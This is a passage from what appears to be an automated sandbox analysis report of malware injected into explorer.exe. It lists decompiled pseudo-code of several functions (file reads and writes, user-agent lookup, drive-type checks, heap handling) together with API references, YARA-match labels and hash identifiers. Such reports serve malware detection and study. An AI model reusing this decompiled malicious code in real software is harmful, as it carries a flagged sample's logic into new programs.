										E007A8BF4( &_v80, 0xfffffffe);
										_pop(_t219);
									}
								}
							}
							goto L26;
						}
						if(_t219 != 2) {
							goto L26;
						}
						E007A5057();
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t183 =  *0x7bf818; // 0xeaf6c8
						 *((intOrPtr*)(_t183 + 0xe4))( &_v72);
						_t187 = _v66 + 0x00000002 & 0x0000ffff;
						_v100 = _t187;
						_t236 = 0x3c;
						_v104 = _t187 / _t236 + _v68 & 0x0000ffff;
						_t212 = E007A8BDE(0x1000);
						_v92 = _t212;
						_pop(_t237);
						if(_t212 != 0) {
							_t192 = E007A9DF2(_t237, 0x3c0);
							_t239 =  *0x7bf81c; // 0x7d0000
							_push(_t239 + 0x228);
							_t241 = 0x3c;
							_v96 = _t192;
							_push(_v100 % _t241 & 0x0000ffff);
							E007A9E51(_t212, 0x1000, _t192, _v104 & 0x0000ffff);
							E007A8BAF( &_v96);
							E007AB5FB(_t212, 0, 0xbb8, 1, 0);
							E007A8BF4( &_v92, 0xfffffffe);
						}
						goto L19;
					}
					_t206 =  *((intOrPtr*)(_t266 + 0x214));
					if(_t206 == _t210 ||  *((intOrPtr*)(_t266 + 4)) < 6 && _t206 == 2) {
						goto L8;
					} else {
						goto L26;
					}
				}
			}







































































                                                                                                                                                                        0x007a53c7
                                                                                                                                                                        0x007a53cd
                                                                                                                                                                        0x007a53d3
                                                                                                                                                                        0x007a53d5
                                                                                                                                                                        0x007a53da
                                                                                                                                                                        0x007a53dc
                                                                                                                                                                        0x007a5841
                                                                                                                                                                        0x007a5841
                                                                                                                                                                        0x007a5841
                                                                                                                                                                        0x007a5844
                                                                                                                                                                        0x007a584a
                                                                                                                                                                        0x007a584a
                                                                                                                                                                        0x007a53e2
                                                                                                                                                                        0x007a53e9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a53ef
                                                                                                                                                                        0x007a53ef
                                                                                                                                                                        0x007a53f6
                                                                                                                                                                        0x007a5401
                                                                                                                                                                        0x007a5406
                                                                                                                                                                        0x007a540d
                                                                                                                                                                        0x007a5413
                                                                                                                                                                        0x007a5415
                                                                                                                                                                        0x007a5416
                                                                                                                                                                        0x007a541a
                                                                                                                                                                        0x007a5425
                                                                                                                                                                        0x007a542a
                                                                                                                                                                        0x007a5433
                                                                                                                                                                        0x007a5438
                                                                                                                                                                        0x007a5440
                                                                                                                                                                        0x007a5447
                                                                                                                                                                        0x007a544a
                                                                                                                                                                        0x007a5453
                                                                                                                                                                        0x007a5456
                                                                                                                                                                        0x007a5456
                                                                                                                                                                        0x007a545f
                                                                                                                                                                        0x007a5464
                                                                                                                                                                        0x007a5474
                                                                                                                                                                        0x007a547a
                                                                                                                                                                        0x007a547c
                                                                                                                                                                        0x007a5481
                                                                                                                                                                        0x007a5487
                                                                                                                                                                        0x007a5490
                                                                                                                                                                        0x007a54af
                                                                                                                                                                        0x007a54b8
                                                                                                                                                                        0x007a54bd
                                                                                                                                                                        0x007a54c1
                                                                                                                                                                        0x007a54ca
                                                                                                                                                                        0x007a54ce
                                                                                                                                                                        0x007a54d3
                                                                                                                                                                        0x007a54d6
                                                                                                                                                                        0x007a54d8
                                                                                                                                                                        0x007a54df
                                                                                                                                                                        0x007a54ea
                                                                                                                                                                        0x007a54ea
                                                                                                                                                                        0x007a54f0
                                                                                                                                                                        0x007a54fc
                                                                                                                                                                        0x007a5778
                                                                                                                                                                        0x007a577d
                                                                                                                                                                        0x007a5783
                                                                                                                                                                        0x007a5785
                                                                                                                                                                        0x007a5786
                                                                                                                                                                        0x007a578a
                                                                                                                                                                        0x007a579a
                                                                                                                                                                        0x007a579f
                                                                                                                                                                        0x007a57a3
                                                                                                                                                                        0x007a57a5
                                                                                                                                                                        0x007a57a9
                                                                                                                                                                        0x007a57ae
                                                                                                                                                                        0x007a57b0
                                                                                                                                                                        0x007a57b2
                                                                                                                                                                        0x007a57b8
                                                                                                                                                                        0x007a57b8
                                                                                                                                                                        0x007a57c5
                                                                                                                                                                        0x007a57cb
                                                                                                                                                                        0x007a57d1
                                                                                                                                                                        0x007a57d6
                                                                                                                                                                        0x007a57f4
                                                                                                                                                                        0x007a57f6
                                                                                                                                                                        0x007a5808
                                                                                                                                                                        0x007a580a
                                                                                                                                                                        0x007a5810
                                                                                                                                                                        0x007a5822
                                                                                                                                                                        0x007a5828
                                                                                                                                                                        0x007a5834
                                                                                                                                                                        0x007a5601
                                                                                                                                                                        0x007a5601
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a5601
                                                                                                                                                                        0x007a5502
                                                                                                                                                                        0x007a550b
                                                                                                                                                                        0x007a550d
                                                                                                                                                                        0x007a5512
                                                                                                                                                                        0x007a5518
                                                                                                                                                                        0x007a5518
                                                                                                                                                                        0x007a5512
                                                                                                                                                                        0x007a551a
                                                                                                                                                                        0x007a551f
                                                                                                                                                                        0x007a5527
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a5531
                                                                                                                                                                        0x007a5608
                                                                                                                                                                        0x007a560e
                                                                                                                                                                        0x007a5614
                                                                                                                                                                        0x007a561f
                                                                                                                                                                        0x007a5620
                                                                                                                                                                        0x007a5621
                                                                                                                                                                        0x007a5622
                                                                                                                                                                        0x007a5628
                                                                                                                                                                        0x007a562d
                                                                                                                                                                        0x007a5633
                                                                                                                                                                        0x007a563b
                                                                                                                                                                        0x007a5641
                                                                                                                                                                        0x007a5644
                                                                                                                                                                        0x007a5653
                                                                                                                                                                        0x007a565a
                                                                                                                                                                        0x007a565d
                                                                                                                                                                        0x007a5661
                                                                                                                                                                        0x007a566a
                                                                                                                                                                        0x007a566e
                                                                                                                                                                        0x007a567b
                                                                                                                                                                        0x007a5680
                                                                                                                                                                        0x007a5683
                                                                                                                                                                        0x007a5685
                                                                                                                                                                        0x007a5691
                                                                                                                                                                        0x007a5696
                                                                                                                                                                        0x007a5698
                                                                                                                                                                        0x007a569c
                                                                                                                                                                        0x007a569d
                                                                                                                                                                        0x007a569f
                                                                                                                                                                        0x007a56aa
                                                                                                                                                                        0x007a56b0
                                                                                                                                                                        0x007a56bc
                                                                                                                                                                        0x007a56ca
                                                                                                                                                                        0x007a56cf
                                                                                                                                                                        0x007a56e4
                                                                                                                                                                        0x007a56e9
                                                                                                                                                                        0x007a56ec
                                                                                                                                                                        0x007a56f0
                                                                                                                                                                        0x007a56f2
                                                                                                                                                                        0x007a5705
                                                                                                                                                                        0x007a570f
                                                                                                                                                                        0x007a5713
                                                                                                                                                                        0x007a571b
                                                                                                                                                                        0x007a571c
                                                                                                                                                                        0x007a5724
                                                                                                                                                                        0x007a5725
                                                                                                                                                                        0x007a572a
                                                                                                                                                                        0x007a5736
                                                                                                                                                                        0x007a5740
                                                                                                                                                                        0x007a5754
                                                                                                                                                                        0x007a5759
                                                                                                                                                                        0x007a5763
                                                                                                                                                                        0x007a5769
                                                                                                                                                                        0x007a5771
                                                                                                                                                                        0x007a5777
                                                                                                                                                                        0x007a5777
                                                                                                                                                                        0x007a569f
                                                                                                                                                                        0x007a5685
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a560e
                                                                                                                                                                        0x007a553a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a5540
                                                                                                                                                                        0x007a554b
                                                                                                                                                                        0x007a554c
                                                                                                                                                                        0x007a554d
                                                                                                                                                                        0x007a554e
                                                                                                                                                                        0x007a5554
                                                                                                                                                                        0x007a5559
                                                                                                                                                                        0x007a556d
                                                                                                                                                                        0x007a5572
                                                                                                                                                                        0x007a5576
                                                                                                                                                                        0x007a5581
                                                                                                                                                                        0x007a558a
                                                                                                                                                                        0x007a558c
                                                                                                                                                                        0x007a5590
                                                                                                                                                                        0x007a5593
                                                                                                                                                                        0x007a559a
                                                                                                                                                                        0x007a55a0
                                                                                                                                                                        0x007a55b2
                                                                                                                                                                        0x007a55b5
                                                                                                                                                                        0x007a55b8
                                                                                                                                                                        0x007a55c5
                                                                                                                                                                        0x007a55cd
                                                                                                                                                                        0x007a55d7
                                                                                                                                                                        0x007a55eb
                                                                                                                                                                        0x007a55fa
                                                                                                                                                                        0x007a5600
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a5593
                                                                                                                                                                        0x007a5492
                                                                                                                                                                        0x007a549a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a549a

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleModule$Process$AttributesCodeCreateExitFileFreeHeap_vsnwprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1791054438-0
                                                                                                                                                                        • Opcode ID: 5aeb2dab6abeb157ae46f229c9fb03d83c6428f07457d3897c3c13ab967dd6df
                                                                                                                                                                        • Instruction ID: b4054d5d0e96a75af1771e4fc610bef088a627e8b0a6d3ddab6771ab8ca64925
                                                                                                                                                                        • Opcode Fuzzy Hash: 5aeb2dab6abeb157ae46f229c9fb03d83c6428f07457d3897c3c13ab967dd6df
                                                                                                                                                                        • Instruction Fuzzy Hash: 0FC1C372604700EFD750EB68DC46FAA73E9ABCA710F04873AF554D72D1DA78D9008B66
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AB3C7 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007AB3C7(char _a4, intOrPtr* _a8) {
				char _v8;
				void* __ecx;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t22;
				void* _t24;
				intOrPtr* _t25;
				void* _t29;
				intOrPtr _t42;
				char _t44;

				_t32 = _a4;
				_t44 = 0;
				_v8 = 0;
				if(_a4 != 0) {
					_t29 = E007AB2FE(_t32);
					if(_t29 == 0) {
						L12:
						_t14 = 0;
						L13:
						L14:
						return _t14;
					}
					_t15 =  *0x7bf818; // 0xeaf6c8
					_t42 =  *((intOrPtr*)(_t15 + 0xf4))(_t29, 0);
					if(_t42 == 0) {
						L10:
						_t17 =  *0x7bf818; // 0xeaf6c8
						 *((intOrPtr*)(_t17 + 0x30))(_t29);
						if(_t44 != 0) {
							E007A8BF4( &_v8, 0);
						}
						goto L12;
					}
					_t4 = _t42 + 1; // 0x1
					_t22 = E007A8BDE(_t4); // executed
					_t44 = _t22;
					_v8 = _t44;
					if(_t44 == 0) {
						goto L10;
					}
					_t24 = E007AB36C(_t29, _t44, _t42,  &_a4); // executed
					if(_t24 == 0 || _a4 != _t42) {
						goto L10;
					} else {
						_t25 = _a8;
						 *((char*)(_t42 + _t44)) = 0;
						if(_t25 != 0) {
							 *_t25 = _t42;
						}
						FindCloseChangeNotification(_t29);
						_t14 = _t44;
						goto L13;
					}
				}
				_t14 = 0;
				goto L14;
			}














                                                                                                                                                                        0x007ab3cb
                                                                                                                                                                        0x007ab3cf
                                                                                                                                                                        0x007ab3d1
                                                                                                                                                                        0x007ab3d6
                                                                                                                                                                        0x007ab3e6
                                                                                                                                                                        0x007ab3ea
                                                                                                                                                                        0x007ab460
                                                                                                                                                                        0x007ab460
                                                                                                                                                                        0x007ab462
                                                                                                                                                                        0x007ab464
                                                                                                                                                                        0x007ab466
                                                                                                                                                                        0x007ab466
                                                                                                                                                                        0x007ab3ec
                                                                                                                                                                        0x007ab3fa
                                                                                                                                                                        0x007ab3fe
                                                                                                                                                                        0x007ab446
                                                                                                                                                                        0x007ab446
                                                                                                                                                                        0x007ab44c
                                                                                                                                                                        0x007ab451
                                                                                                                                                                        0x007ab459
                                                                                                                                                                        0x007ab45f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ab451
                                                                                                                                                                        0x007ab400
                                                                                                                                                                        0x007ab404
                                                                                                                                                                        0x007ab409
                                                                                                                                                                        0x007ab40b
                                                                                                                                                                        0x007ab411
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ab41c
                                                                                                                                                                        0x007ab425
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ab42c
                                                                                                                                                                        0x007ab42c
                                                                                                                                                                        0x007ab42f
                                                                                                                                                                        0x007ab435
                                                                                                                                                                        0x007ab437
                                                                                                                                                                        0x007ab437
                                                                                                                                                                        0x007ab43f
                                                                                                                                                                        0x007ab442
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ab442
                                                                                                                                                                        0x007ab425
                                                                                                                                                                        0x007ab3d8
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,007B0BBE,00000000,00000000,007CEFE0,007BC9A0,00000000,007BC9A0,00000000,00000000,?,00000294,00000000,00EAFB48,00000400), ref: 007AB43F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                        • Opcode ID: f7edebe135204845594ca1fa07b00baf8d82e6cf2cfe26861355a12e04376c19
                                                                                                                                                                        • Instruction ID: 6614a873b4541a5ff76ce1cb2541b4a272a490d1fbd733ff582eeb0a1475159f
                                                                                                                                                                        • Opcode Fuzzy Hash: f7edebe135204845594ca1fa07b00baf8d82e6cf2cfe26861355a12e04376c19
                                                                                                                                                                        • Instruction Fuzzy Hash: E3119372601656ABDB109F69DC85B9A77DCEB8EB50F104365F901C7253EB38DD0087A1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007A600C Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007A600C(void* __edx, void* __fp0) {
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				intOrPtr* _t16;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t32;
				void* _t38;
				signed int _t39;
				intOrPtr* _t40;
				void* _t46;

				_t46 = __fp0;
				_t38 = __edx;
				_t39 = 0;
				_t16 = E007A8BDE(0x14);
				_t32 =  *0x7bf81c; // 0x7d0000
				_t40 = _t16;
				if( *((short*)(_t32 + 0x22a)) == 0x3a) {
					_v36 =  *((intOrPtr*)(_t32 + 0x228));
					_v34 =  *((intOrPtr*)(_t32 + 0x22a));
					_v32 =  *((intOrPtr*)(_t32 + 0x22c));
					_v30 = 0;
					GetDriveTypeW( &_v36); // executed
				}
				 *_t40 = 2;
				 *(_t40 + 4) = _t39;
				_t17 =  *0x7bf81c; // 0x7d0000
				 *((intOrPtr*)(_t40 + 8)) =  *((intOrPtr*)(_t17 + 0x224));
				_t18 = E007A2BE4( *((intOrPtr*)(_t17 + 0x224)), _t38, 0, _t46); // executed
				 *((intOrPtr*)(_t40 + 0xc)) = _t18;
				if(_t18 == 0) {
					L4:
					if(E007A32A3() == 0) {
						goto L6;
					} else {
						_t39 = _t39 | 0xffffffff;
					}
				} else {
					_t38 = 0x3b;
					if(E007AAEC1(_t18, _t38) != 0) {
						L6:
						E007A53C7(_t40, _t38, __eflags, _t46);
					} else {
						goto L4;
					}
				}
				E007AAFD6();
				E007AAFD6();
				return _t39;
			}















                                                                                                                                                                        0x007a600c
                                                                                                                                                                        0x007a600c
                                                                                                                                                                        0x007a6017
                                                                                                                                                                        0x007a6019
                                                                                                                                                                        0x007a601f
                                                                                                                                                                        0x007a6025
                                                                                                                                                                        0x007a602f
                                                                                                                                                                        0x007a6038
                                                                                                                                                                        0x007a6043
                                                                                                                                                                        0x007a604e
                                                                                                                                                                        0x007a6054
                                                                                                                                                                        0x007a605c
                                                                                                                                                                        0x007a605c
                                                                                                                                                                        0x007a6062
                                                                                                                                                                        0x007a6068
                                                                                                                                                                        0x007a606b
                                                                                                                                                                        0x007a6076
                                                                                                                                                                        0x007a6079
                                                                                                                                                                        0x007a607e
                                                                                                                                                                        0x007a6083
                                                                                                                                                                        0x007a6093
                                                                                                                                                                        0x007a609a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a609c
                                                                                                                                                                        0x007a609c
                                                                                                                                                                        0x007a609c
                                                                                                                                                                        0x007a6085
                                                                                                                                                                        0x007a6087
                                                                                                                                                                        0x007a6091
                                                                                                                                                                        0x007a60a1
                                                                                                                                                                        0x007a60a3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a6091
                                                                                                                                                                        0x007a60ab
                                                                                                                                                                        0x007a60b3
                                                                                                                                                                        0x007a60be

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,007A959D,00000100,?,007A6507), ref: 007A8BEC
                                                                                                                                                                        • GetDriveTypeW.KERNELBASE(?), ref: 007A605C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateDriveHeapType
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 414167704-0
                                                                                                                                                                        • Opcode ID: ce6d25339b04dbbfd27ee68463cf11fe991978f235da93ee1030c2c4cdaa7990
                                                                                                                                                                        • Instruction ID: 3ab6f6adb018144a07542306bc7c49a53234923eb02ad8d0eb1eb710f22d5202
                                                                                                                                                                        • Opcode Fuzzy Hash: ce6d25339b04dbbfd27ee68463cf11fe991978f235da93ee1030c2c4cdaa7990
                                                                                                                                                                        • Instruction Fuzzy Hash: 3D11B2786003019ACB14AFB5D809AAAB3E4BF89754F14863DE815C7291EB79D842CB65
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AB36C Relevance: 1.5, APIs: 1, Instructions: 45fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,007AB421,00000000,00000000,?,007B0BBE,00000000), ref: 007AB3AA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                                                        • Opcode ID: ffa7d1b720c0d3b098c26db11001e45e9a5c197d62f6f6fec03a978902084ca5
                                                                                                                                                                        • Instruction ID: 151d309abffd398aa5f7db203cac9290fcebd12ce3e4f61ddd5f24d901eeac9e
                                                                                                                                                                        • Opcode Fuzzy Hash: ffa7d1b720c0d3b098c26db11001e45e9a5c197d62f6f6fec03a978902084ca5
                                                                                                                                                                        • Instruction Fuzzy Hash: EA01FB72600218FFDB11CA99DC45BAA77ACEB85755F204169A809D7101E374EE009BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AF4C9 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                                        			E007AF4C9(void* __ecx, void* __edx) {
				char _v8;
				intOrPtr* _t5;
				intOrPtr _t10;
				intOrPtr* _t11;
				void* _t12;

				_push(__ecx);
				_t5 =  *0x7bf844; // 0xeafda8
				if( *_t5 == 0) {
					_v8 = E007A9DD8(0xa8);
					 *0x7bf920 = E007A9880(_t6, 0);
					E007A8B9C( &_v8);
					goto L4;
				} else {
					_v8 = 0x100;
					_t10 = E007A8BDE(0x101);
					 *0x7bf920 = _t10;
					_t11 =  *0x7bf844; // 0xeafda8
					_t12 =  *_t11(0, _t10,  &_v8); // executed
					if(_t12 == 0) {
						L4:
						return 0;
					} else {
						return E007A8BF4(0x7bf920, 0xffffffff) | 0xffffffff;
					}
				}
			}








                                                                                                                                                                        0x007af4cc
                                                                                                                                                                        0x007af4cd
                                                                                                                                                                        0x007af4d5
                                                                                                                                                                        0x007af51f
                                                                                                                                                                        0x007af52c
                                                                                                                                                                        0x007af531
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007af4d7
                                                                                                                                                                        0x007af4dc
                                                                                                                                                                        0x007af4e3
                                                                                                                                                                        0x007af4ec
                                                                                                                                                                        0x007af4f3
                                                                                                                                                                        0x007af4fa
                                                                                                                                                                        0x007af4fe
                                                                                                                                                                        0x007af536
                                                                                                                                                                        0x007af539
                                                                                                                                                                        0x007af500
                                                                                                                                                                        0x007af512
                                                                                                                                                                        0x007af512
                                                                                                                                                                        0x007af4fe

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,007A959D,00000100,?,007A6507), ref: 007A8BEC
                                                                                                                                                                        • ObtainUserAgentString.URLMON(00000000,00000000,00000100,0000087A,?,007AF570,007A5C5C,?,007A6009), ref: 007AF4FA
                                                                                                                                                                          • Part of subcall function 007A8BF4: RtlFreeHeap.NTDLL(00000000,00000000), ref: 007A8C3A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AgentAllocateFreeObtainStringUser
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 471734292-0
                                                                                                                                                                        • Opcode ID: 9382b773f7ac48fbd5aa064a58432008707736058ecd8fc6f1a7fde6f9b2c26f
                                                                                                                                                                        • Instruction ID: e16ad683fd8dda8c300393ec3492fb67734403947d298fbf89f9a406b4c4331d
                                                                                                                                                                        • Opcode Fuzzy Hash: 9382b773f7ac48fbd5aa064a58432008707736058ecd8fc6f1a7fde6f9b2c26f
                                                                                                                                                                        • Instruction Fuzzy Hash: 76F068B0A05200EEE748EFB8DC15F9973E4AB86764F244368E515D71D0DF7C9E00C625
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AB31F Relevance: 1.5, APIs: 1, Instructions: 37fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                                        			E007AB31F(void* __ecx, void* __edx, intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _t13;
				void* _t21;
				void* _t23;
				void* _t26;

				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t26 = 0;
				_v12 = __ecx;
				_t21 = __edx;
				if(_a4 == 0) {
					L3:
					_t13 = 1;
				} else {
					while(1) {
						_v8 = _v8 & 0x00000000;
						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
							break;
						}
						_t26 = _t26 + _v8;
						_t23 = _v12;
						if(_t26 < _a4) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					_t13 = 0;
				}
				L4:
				return _t13;
			}









                                                                                                                                                                        0x007ab31f
                                                                                                                                                                        0x007ab322
                                                                                                                                                                        0x007ab323
                                                                                                                                                                        0x007ab326
                                                                                                                                                                        0x007ab328
                                                                                                                                                                        0x007ab32b
                                                                                                                                                                        0x007ab330
                                                                                                                                                                        0x007ab361
                                                                                                                                                                        0x007ab363
                                                                                                                                                                        0x007ab332
                                                                                                                                                                        0x007ab332
                                                                                                                                                                        0x007ab332
                                                                                                                                                                        0x007ab354
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ab356
                                                                                                                                                                        0x007ab359
                                                                                                                                                                        0x007ab35f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ab35f
                                                                                                                                                                        0x007ab368
                                                                                                                                                                        0x007ab368
                                                                                                                                                                        0x007ab364
                                                                                                                                                                        0x007ab367

                                                                                                                                                                        APIs
                                                                                                                                                                        • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,007A956A,?), ref: 007AB34C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileWrite
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3934441357-0
                                                                                                                                                                        • Opcode ID: 19586f01c931cfec5527e0ce0bf8d3f168567029b7ad837adacd575c340ccb11
                                                                                                                                                                        • Instruction ID: c5814b9312782899b33c950af2b3d833e85c7ff3e193f49856055e8298bb3482
                                                                                                                                                                        • Opcode Fuzzy Hash: 19586f01c931cfec5527e0ce0bf8d3f168567029b7ad837adacd575c340ccb11
                                                                                                                                                                        • Instruction Fuzzy Hash: 24F0F972A10218BFDB14CFA8DC85BAB7BACEB49740F118269A505E7101E774AE409BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AC879 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007AC879(void* __ecx) {
				signed int _v8;
				intOrPtr _t12;
				void* _t13;
				void* _t14;
				void* _t17;
				intOrPtr _t18;
				void* _t23;

				_v8 = _v8 & 0x00000000;
				_t12 =  *0x7bf820; // 0xeaf8b8
				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
				if(_t13 != 0) {
					_t14 = E007AC862(); // executed
					_t23 = _t14;
					if(_t23 != 0) {
						FindCloseChangeNotification(_v8);
						_t17 = _t23;
					} else {
						if(_v8 != _t14) {
							_t18 =  *0x7bf818; // 0xeaf6c8
							 *((intOrPtr*)(_t18 + 0x30))(_v8);
						}
						_t17 = 0;
					}
					return _t17;
				} else {
					return _t13;
				}
			}










                                                                                                                                                                        0x007ac87d
                                                                                                                                                                        0x007ac885
                                                                                                                                                                        0x007ac88d
                                                                                                                                                                        0x007ac892
                                                                                                                                                                        0x007ac89a
                                                                                                                                                                        0x007ac89f
                                                                                                                                                                        0x007ac8a3
                                                                                                                                                                        0x007ac8c1
                                                                                                                                                                        0x007ac8c4
                                                                                                                                                                        0x007ac8a5
                                                                                                                                                                        0x007ac8a8
                                                                                                                                                                        0x007ac8aa
                                                                                                                                                                        0x007ac8b2
                                                                                                                                                                        0x007ac8b2
                                                                                                                                                                        0x007ac8b5
                                                                                                                                                                        0x007ac8b5
                                                                                                                                                                        0x007ac8c8
                                                                                                                                                                        0x007ac895
                                                                                                                                                                        0x007ac895
                                                                                                                                                                        0x007ac895

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 790d09370d9de3bee0aaad945316e11b95ed7eaa57d66136c98e90fd41959bf0
                                                                                                                                                                        • Instruction ID: 2b814434a48af55082fae1e93087c13409b6f57ca75824f1c300e7ef8d76d8e6
                                                                                                                                                                        • Opcode Fuzzy Hash: 790d09370d9de3bee0aaad945316e11b95ed7eaa57d66136c98e90fd41959bf0
                                                                                                                                                                        • Instruction Fuzzy Hash: 16F01732A10604FBDB12DBA4DD06E9D73F8BB49745F1142A4E501E7160DB3CDE009B94
                                                                                                                                                                        Uniqueness

